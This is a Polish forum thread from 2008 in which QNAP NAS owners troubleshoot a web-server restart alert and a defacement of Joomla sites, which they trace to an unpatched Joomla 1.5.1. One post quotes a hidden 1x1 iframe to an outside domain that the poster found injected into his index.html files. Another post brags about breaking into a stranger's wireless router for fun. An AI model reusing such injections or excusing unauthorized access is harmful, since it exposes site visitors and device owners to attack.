Rozwiązany Alrm przysłąny z Qnapa.?

Dyskusja w 'Hydepark i związane z forum' rozpoczęta przez użytkownika Grzes978, 1 Listopad 2008.

Ładowanie...
  1. Grzes978
    Offline

    Grzes978 Entry Technician Q Associate

    Dołączył:
    20 Maj 2008
    Wiadomości:
    72
    Miejscowość:
    Bielsko Biała
    Local Time:
    06:52
    Oceny:
    +1 / 0 / -0
    Followers:
    0
    QNAP:
    TS-109/209 Pro
    Ethernet:
    100 Mbps
    TS-109/209 Pro 100 Mbps
    Mam pytanko co oznacza taki alarm?

    Dziękuję

    Server Name: Qnap
    IP Address: 192.168.1.200
    Date/Time: 11/01/2008 16:59:05
    Level: Warning
    Re-launch process [thttpd].
     
  2. Nicodem
    Offline

    Nicodem Staff Contributor

    Dołączył:
    15 Sierpień 2008
    Wiadomości:
    132
    Miejscowość:
    Warszawa
    Local Time:
    06:52
    Oceny:
    +3 / 0 / -0
    Followers:
    1
    Z jakiegoś powodu QNAP musiał zrestartować serwer WWW na którym stoi WebUI (strony administracyjne).
    Czasami tak się zdarza. Jeśli nie masz tego zbyt często to raczej nie należy się przejmować. Nie było to związane przypadkiem (sprawdź czas) z 'bieganiem' po stronach admina?
     
  3. Grzes978
    Offline

    Grzes978 Entry Technician Q Associate

    Dołączył:
    20 Maj 2008
    Wiadomości:
    72
    Miejscowość:
    Bielsko Biała
    Local Time:
    06:52
    Oceny:
    +1 / 0 / -0
    Followers:
    0
    QNAP:
    TS-109/209 Pro
    Ethernet:
    100 Mbps
    TS-109/209 Pro 100 Mbps
    hmnn

    sądzę że w 99 procentach nie

    zdarzyło się to mi tylko jeden raz

    choć po Twoim poście jeszcze raz. zobaczymy czy dalej się będzie powtarzać
     
  4. Grzes978
    Offline

    Grzes978 Entry Technician Q Associate

    Dołączył:
    20 Maj 2008
    Wiadomości:
    72
    Miejscowość:
    Bielsko Biała
    Local Time:
    06:52
    Oceny:
    +1 / 0 / -0
    Followers:
    0
    QNAP:
    TS-109/209 Pro
    Ethernet:
    100 Mbps
    TS-109/209 Pro 100 Mbps
    Chyba wiem jaka jest przyczyna :)

    aimg247.imagevenue.com_loc4_th_91093_1_122_4lo.JPG

    stałem się ofiarą hackingu ;( :)
     
  5. Nicodem
    Offline

    Nicodem Staff Contributor

    Dołączył:
    15 Sierpień 2008
    Wiadomości:
    132
    Miejscowość:
    Warszawa
    Local Time:
    06:52
    Oceny:
    +3 / 0 / -0
    Followers:
    1
    a to juz dosc powazna sprawa. mozesz to opisac? trzebaby skontaktowac sie z ludzmi z qnap'a na angielskim forum. Wielkrotnie zglaszano im braki w bezpieczenstwie - moze teraz by jakos zareagowali.
     
  6. Grzes978
    Offline

    Grzes978 Entry Technician Q Associate

    Dołączył:
    20 Maj 2008
    Wiadomości:
    72
    Miejscowość:
    Bielsko Biała
    Local Time:
    06:52
    Oceny:
    +1 / 0 / -0
    Followers:
    0
    QNAP:
    TS-109/209 Pro
    Ethernet:
    100 Mbps
    TS-109/209 Pro 100 Mbps
    mogę opisać

    tak wygladają dwie moje strony

    www.komorowice.eu i www.alikom.komorowice.eu

    zmieniony dostęp do Joomli na której zostały postawione strony, i na tym chyba koniec, pliki na serwerze chyba nieruszone, tzn. osobiste dane, itp, nie iwem czy coś nie było majstrowane w panelu administracyjnym, miłąem to samo hasło na głowna stronę i na Qnapa, hasło zmienione. :) musze jeszcze przejrzeć ustawienia.

    generalnie tacy ludzie zazwyczaj tylko łądują swoje strony po to by pokazać że się włamali i że się ma słabe zabezpieczenia, plus zmieniają hasła tak dla jaj by utrudnić życie, generalnie dla psoty.

    Sam kiedyś resetłem komuś router bezprzewodowy i zmieniłem dane plus zmiana hasła i następnie wysłąłem maila by sobie poustawiał clonowanie mac adresów.

    Gościa kosztowało to 15 minut roboty i dodatkowo czegoś sie nauczył na przyszłość,a ja miałem satysfakcję :D że jestem mini hackerem

    jakby ktoś miał jakies pytania chętnie napisze
     
  7. Grzes978
    Offline

    Grzes978 Entry Technician Q Associate

    Dołączył:
    20 Maj 2008
    Wiadomości:
    72
    Miejscowość:
    Bielsko Biała
    Local Time:
    06:52
    Oceny:
    +1 / 0 / -0
    Followers:
    0
    QNAP:
    TS-109/209 Pro
    Ethernet:
    100 Mbps
    TS-109/209 Pro 100 Mbps
    witam i znów dzisiaj otzrymałem mały atak z tej samej strony i powiem ze już mi się to nudzi

    p.s. czy wynika z tego ze do Qnapa tak łątwo się włamać, hasła mam dosć skomplikowane, wiec jestem w kropce bo nie wiem jaka moze być przyczyna.

    jak ktoś jest ciekawy to prosze kliknac w ponizszy link komorowice.eu.

    Silas moze ty masz jakieś pomysły jak to wywalić z qnapa, bo usuwać wszystko i wgrywac od nowa mi się nie chce.

    Dzięki za podpowiedzi co do naprawy jak i bezpieczeństwa na przyszłość.
     
  8. Gregor
    Offline

    Gregor System Engineer Q Specialist

    Dołączył:
    28 Listopad 2008
    Wiadomości:
    116
    Local Time:
    06:52
    Oceny:
    +9 / 0 / -0
    Followers:
    0
    QNAP:
    TS-239 Pro II
    Ethernet:
    1 GbE
    TS-239 Pro II 1 GbE
    Może to problem z prawami dostępu do plików?

    Ja jakiś czas temu też odkrylem, że we wszystkich plikach index.html znalazło sie coś takiego

    <iframe src="http://bigtopescorts.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden"></iframe>

    Wykasowalem to i po sprawie. Ale nadal nie mam pojęcia jak się to do mnie dostalo wow
     
  9. hypnosiss
    Offline

    hypnosiss Moderator Contributor

    Dołączył:
    6 Lipiec 2008
    Wiadomości:
    321
    Miejscowość:
    Polska, Wrocław
    Local Time:
    06:52
    Oceny:
    +28 / 0 / -0
    Followers:
    0
    QNAP:
    TS-109/209
    Ethernet:
    1 GbE
    TS-109/209 1 GbE
    ja myślę że jest to luka poprostu w cms'sie joomla a w takich "publikach" co rusz się pojawiają nowe luki. Wystarczy aktualizować joomle...
    na 95% to nie jest wina QNAPA :) za bardzo prosty jest ten PA żeby były i tam jakieś luki a jeśli by były to baardzo mało i zostały dawno załatane przez ekspertów, którzy znają się na rzeczy(mówie tu tylko i wyłącznie o skrypty www Qnap'a) ;)
    Jesli jest luka w jakimś oprogramowaniu "ZAINSTALOWANYM" na QNAPie to włamanie się poprzez nią może wywołać fatalne skutki bo dzięki temu atakujący ma dostęp do plików, bazy danych . A i to wystarczy by wgrać skrypt, który uruchomi daną aplikację, bądź pobierze np: hasła ;) - ale i przed tym da się uchronić xD
     
  10. Grzes978
    Offline

    Grzes978 Entry Technician Q Associate

    Dołączył:
    20 Maj 2008
    Wiadomości:
    72
    Miejscowość:
    Bielsko Biała
    Local Time:
    06:52
    Oceny:
    +1 / 0 / -0
    Followers:
    0
    QNAP:
    TS-109/209 Pro
    Ethernet:
    100 Mbps
    TS-109/209 Pro 100 Mbps
    Chyba masz rację, a raczej na pewno, bo właśnie sobie przypomniałem że ta wersja Joomli to była 1.5.1, a wiem że miała dziury, miałem ją "zupdejtować" ale jakooś sie zeszło. :-( no nic trudno, człowiek uczy się na błedach. dzięki
     
Ładowanie...